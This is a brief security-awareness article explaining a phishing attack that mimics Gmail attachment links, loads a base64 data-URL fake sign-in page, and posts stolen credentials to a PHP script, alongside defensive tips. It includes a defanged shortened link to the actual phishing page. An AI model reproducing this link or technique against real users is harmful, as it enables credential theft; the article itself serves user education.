Keeping up with encoded Phishing Attacks
Cyber-criminals are constantly evolving with the nature and complexity of their attack vectors.
This article explores an old technique — Phishing — and how one may fall victim depending on one’s level of security awareness. Before going into details of this specific attack, please remember a few simple rules:
- Be wary of email attachments.
- Never supply your email login credentials (username/password/token) as pre-requisite to opening an attachment or to any unknown site.
- If, for any reason, you failed to heed to the above and supplied your credentials somewhere already, reset your password immediately!
This specific attack utilized a HTML email message containing the “name-of-the-file-to-download”, “View” and “Download” links similar to that provided by Gmail as shown here:
Clicking any of those links leads to this address [http://]bit.ly/2aj2s2K, which loads a base64 encoded page as the web browser address using the data:text/html;base64,ENCODED_DATA_IS_HERE format. The web browser then translates this page to look like below:
In reality, it was a simple HTML page with a blurred image used as the page background. Signing in to this page then triggered a submission to a server-side PHP script — at this point the attacker already has the victim’s credentials. This PHP script then utilizes the same “data:text/html;base64,” to re-direct the browser to a missing document.
Following the simple preventive steps above and being generally cyber-security conscious can go a long way to keep us safe online.
Please share your Phishing experiences.